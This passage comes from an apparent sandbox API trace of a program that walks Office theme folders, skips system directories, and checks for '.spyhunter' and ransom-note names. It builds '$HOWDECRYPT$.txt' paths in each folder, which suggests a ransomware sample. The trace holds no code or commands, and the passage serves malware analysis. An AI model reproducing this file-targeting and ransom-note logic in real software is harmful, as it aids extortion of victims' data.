lpFindFileData=0x298eff8) returned 1 [0090.605] lstrcmpiW (lpString1="NETWORK", lpString2="Windows") returned -1 [0090.605] lstrlenW (lpString="Windows") returned 7 [0090.605] lstrcmpiW (lpString1="NETWORK", lpString2="$Recycle.bin") returned 1 [0090.605] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.605] lstrcmpiW (lpString1="NETWORK", lpString2="System Volume Information") returned -1 [0090.605] lstrlenW (lpString="System Volume Information") returned 25 [0090.605] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK") returned 67 [0090.610] lstrcmpW (lpString1="NETWORK", lpString2=".") returned 1 [0090.610] lstrcmpW (lpString1="NETWORK", lpString2="..") returned 1 [0090.610] GetProcessHeap () returned 0x2c0000 [0090.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.610] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\*") returned 69 [0090.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.611] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.611] lstrlenW (lpString="Windows") returned 7 [0090.611] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.611] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.611] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.611] lstrlenW (lpString="System Volume Information") returned 25 [0090.611] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\.") returned 69 [0090.611] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.611] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.611] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.611] lstrlenW (lpString="Windows") returned 7 [0090.611] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.611] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.611] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.611] lstrlenW (lpString="System Volume Information") returned 25 [0090.611] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\..") returned 70 [0090.611] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.611] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.611] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.611] lstrcmpiW (lpString1="NETWORK.ELM", lpString2="Windows") returned -1 [0090.611] lstrlenW (lpString="Windows") returned 7 [0090.611] lstrcmpiW (lpString1="NETWORK.ELM", lpString2="$Recycle.bin") returned 1 [0090.611] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.611] lstrcmpiW (lpString1="NETWORK.ELM", lpString2="System Volume Information") returned -1 [0090.611] lstrlenW (lpString="System Volume Information") returned 25 [0090.611] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 79 [0090.611] StrStrIW (lpFirst="NETWORK.ELM", lpSrch=".spyhunter") returned 0x0 [0090.612] lstrcmpW (lpString1="NETWORK.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.612] lstrcmpW (lpString1="NETWORK.ELM", lpString2="_uninstalling_.png") returned 1 [0090.612] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.ELM") returned 79 [0090.612] GetProcessHeap () returned 0x2c0000 [0090.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x380360 [0090.612] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11a0) returned 0x3824f8 [0090.612] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.612] lstrcmpiW (lpString1="NETWORK.INF", lpString2="Windows") returned -1 [0090.612] lstrlenW (lpString="Windows") returned 7 [0090.612] lstrcmpiW (lpString1="NETWORK.INF", lpString2="$Recycle.bin") returned 1 [0090.612] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.612] lstrcmpiW (lpString1="NETWORK.INF", lpString2="System Volume Information") returned -1 [0090.612] lstrlenW (lpString="System Volume Information") returned 25 [0090.612] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF") returned 79 [0090.612] StrStrIW (lpFirst="NETWORK.INF", lpSrch=".spyhunter") returned 0x0 [0090.612] lstrcmpW (lpString1="NETWORK.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.612] lstrcmpW (lpString1="NETWORK.INF", lpString2="_uninstalling_.png") returned 1 [0090.612] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF") returned 79 [0090.612] GetProcessHeap () returned 0x2c0000 [0090.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x380448 [0090.612] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11a8) returned 0x3824f8 [0090.612] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.612] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.612] lstrlenW (lpString="Windows") returned 7 [0090.612] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.612] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.612] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.613] lstrlenW (lpString="System Volume Information") returned 25 [0090.613] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 79 [0090.613] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.613] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.613] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.613] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 79 [0090.613] GetProcessHeap () returned 0x2c0000 [0090.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x380530 [0090.613] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11b0) returned 0x3824f8 [0090.613] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.613] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.613] lstrlenW (lpString="Windows") returned 7 [0090.613] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.613] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.613] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.613] lstrlenW (lpString="System Volume Information") returned 25 [0090.613] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 80 [0090.613] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.613] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.613] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.613] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 80 [0090.613] GetProcessHeap () returned 0x2c0000 [0090.613] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x3414b0 [0090.613] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11b8) returned 0x3824f8 [0090.613] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.613] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.614] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\$HOWDECRYPT$.txt") returned 84 [0090.614] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\$HOWDECRYPT$.txt") returned 84 [0090.614] GetProcessHeap () returned 0x2c0000 [0090.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x354ce8 [0090.614] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11c0) returned 0x3824f8 [0090.614] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.614] lstrcmpiW (lpString1="PAPYRUS", lpString2="Windows") returned -1 [0090.614] lstrlenW (lpString="Windows") returned 7 [0090.614] lstrcmpiW (lpString1="PAPYRUS", lpString2="$Recycle.bin") returned 1 [0090.614] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.614] lstrcmpiW (lpString1="PAPYRUS", lpString2="System Volume Information") returned -1 [0090.614] lstrlenW (lpString="System Volume Information") returned 25 [0090.614] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS") returned 67 [0090.614] lstrcmpW (lpString1="PAPYRUS", lpString2=".") returned 1 [0090.614] lstrcmpW (lpString1="PAPYRUS", lpString2="..") returned 1 [0090.614] GetProcessHeap () returned 0x2c0000 [0090.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.614] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*") returned 69 [0090.614] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.680] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.680] lstrlenW (lpString="Windows") returned 7 [0090.680] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.680] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.680] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.680] lstrlenW (lpString="System Volume Information") returned 25 [0090.680] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\.") returned 69 [0090.680] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.680] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.680] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.680] lstrlenW (lpString="Windows") returned 7 [0090.681] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.681] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.681] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.681] lstrlenW (lpString="System Volume Information") returned 25 [0090.681] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\..") returned 70 [0090.681] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.681] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.681] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.681] lstrcmpiW (lpString1="PAPYRUS.ELM", lpString2="Windows") returned -1 [0090.681] lstrlenW (lpString="Windows") returned 7 [0090.681] lstrcmpiW (lpString1="PAPYRUS.ELM", lpString2="$Recycle.bin") returned 1 [0090.681] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.681] lstrcmpiW (lpString1="PAPYRUS.ELM", lpString2="System Volume Information") returned -1 [0090.681] lstrlenW (lpString="System Volume Information") returned 25 [0090.681] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM") returned 79 [0090.681] StrStrIW (lpFirst="PAPYRUS.ELM", lpSrch=".spyhunter") returned 0x0 [0090.681] lstrcmpW (lpString1="PAPYRUS.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.681] lstrcmpW (lpString1="PAPYRUS.ELM", lpString2="_uninstalling_.png") returned 1 [0090.681] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM") returned 79 [0090.681] GetProcessHeap () returned 0x2c0000 [0090.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x37fdf0 [0090.681] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11a8) returned 0x3824f8 [0090.681] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.681] lstrcmpiW (lpString1="PAPYRUS.INF", lpString2="Windows") returned -1 [0090.681] lstrlenW (lpString="Windows") returned 7 [0090.681] lstrcmpiW (lpString1="PAPYRUS.INF", lpString2="$Recycle.bin") returned 1 [0090.682] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.682] lstrcmpiW (lpString1="PAPYRUS.INF", lpString2="System Volume Information") returned -1 [0090.682] lstrlenW (lpString="System Volume Information") returned 25 [0090.682] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF") returned 79 [0090.682] StrStrIW (lpFirst="PAPYRUS.INF", lpSrch=".spyhunter") returned 0x0 [0090.682] lstrcmpW (lpString1="PAPYRUS.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.682] lstrcmpW (lpString1="PAPYRUS.INF", lpString2="_uninstalling_.png") returned 1 [0090.682] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.INF") returned 79 [0090.682] GetProcessHeap () returned 0x2c0000 [0090.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x37fd08 [0090.682] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11b0) returned 0x3824f8 [0090.682] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.682] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.682] lstrlenW (lpString="Windows") returned 7 [0090.682] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.682] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.682] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.682] lstrlenW (lpString="System Volume Information") returned 25 [0090.682] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 79 [0090.682] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.682] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.682] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.682] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PREVIEW.GIF") returned 79 [0090.682] GetProcessHeap () returned 0x2c0000 [0090.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x380618 [0090.682] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11b8) returned 0x3824f8 [0090.683] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.683] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.683] lstrlenW (lpString="Windows") returned 7 [0090.683] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.683] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.683] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.683] lstrlenW (lpString="System Volume Information") returned 25 [0090.683] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 80 [0090.683] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.683] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.683] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.683] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 80 [0090.683] GetProcessHeap () returned 0x2c0000 [0090.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x3415a0 [0090.683] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11c0) returned 0x3824f8 [0090.683] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.683] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.683] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\$HOWDECRYPT$.txt") returned 84 [0090.683] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\$HOWDECRYPT$.txt") returned 84 [0090.683] GetProcessHeap () returned 0x2c0000 [0090.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x354ce8 [0090.683] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11c8) returned 0x3824f8 [0090.684] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.684] lstrcmpiW (lpString1="PIXEL", lpString2="Windows") returned -1 [0090.684] lstrlenW (lpString="Windows") returned 7 [0090.684] lstrcmpiW (lpString1="PIXEL", lpString2="$Recycle.bin") returned 1 [0090.684] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.684] lstrcmpiW (lpString1="PIXEL", lpString2="System Volume Information") returned -1 [0090.684] lstrlenW (lpString="System Volume Information") returned 25 [0090.684] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL") returned 65 [0090.684] lstrcmpW (lpString1="PIXEL", lpString2=".") returned 1 [0090.684] lstrcmpW (lpString1="PIXEL", lpString2="..") returned 1 [0090.684] GetProcessHeap () returned 0x2c0000 [0090.684] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.684] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\*") returned 67 [0090.684] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.684] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.684] lstrlenW (lpString="Windows") returned 7 [0090.684] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.684] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.684] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.684] lstrlenW (lpString="System Volume Information") returned 25 [0090.685] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\.") returned 67 [0090.685] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.685] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.685] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.685] lstrlenW (lpString="Windows") returned 7 [0090.685] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.685] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.685] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.685] lstrlenW (lpString="System Volume Information") returned 25 [0090.685] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\..") returned 68 [0090.685] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.685] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.685] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.685] lstrcmpiW (lpString1="PIXEL.ELM", lpString2="Windows") returned -1 [0090.685] lstrlenW (lpString="Windows") returned 7 [0090.685] lstrcmpiW (lpString1="PIXEL.ELM", lpString2="$Recycle.bin") returned 1 [0090.685] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.685] lstrcmpiW (lpString1="PIXEL.ELM", lpString2="System Volume Information") returned -1 [0090.685] lstrlenW (lpString="System Volume Information") returned 25 [0090.685] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM") returned 75 [0090.685] StrStrIW (lpFirst="PIXEL.ELM", lpSrch=".spyhunter") returned 0x0 [0090.685] lstrcmpW (lpString1="PIXEL.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.685] lstrcmpW (lpString1="PIXEL.ELM", lpString2="_uninstalling_.png") returned 1 [0090.685] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM") returned 75 [0090.685] GetProcessHeap () returned 0x2c0000 [0090.685] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x3865c0 [0090.686] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11d0) returned 0x3824f8 [0090.686] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.686] lstrcmpiW (lpString1="PIXEL.INF", lpString2="Windows") returned -1 [0090.686] lstrlenW (lpString="Windows") returned 7 [0090.686] lstrcmpiW (lpString1="PIXEL.INF", lpString2="$Recycle.bin") returned 1 [0090.686] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.686] lstrcmpiW (lpString1="PIXEL.INF", lpString2="System Volume Information") returned -1 [0090.686] lstrlenW (lpString="System Volume Information") returned 25 [0090.686] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF") returned 75 [0090.686] StrStrIW (lpFirst="PIXEL.INF", lpSrch=".spyhunter") returned 0x0 [0090.686] lstrcmpW (lpString1="PIXEL.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.686] lstrcmpW (lpString1="PIXEL.INF", lpString2="_uninstalling_.png") returned 1 [0090.686] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF") returned 75 [0090.686] GetProcessHeap () returned 0x2c0000 [0090.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x345ae8 [0090.686] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11d8) returned 0x3824f8 [0090.686] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.686] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.686] lstrlenW (lpString="Windows") returned 7 [0090.686] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.686] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.686] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.686] lstrlenW (lpString="System Volume Information") returned 25 [0090.686] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 77 [0090.686] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.687] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.687] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.687] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 77 [0090.687] GetProcessHeap () returned 0x2c0000 [0090.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x380700 [0090.687] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x11e0) returned 0x3824f8 [0090.687] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.687] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.687] lstrlenW (lpString="Windows") returned 7 [0090.687] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.687] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.687] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.687] lstrlenW (lpString="System Volume Information") returned 25 [0090.687] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\THMBNAIL.PNG") returned 78 [0090.687] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.687] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.687] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.687] lstrlenW 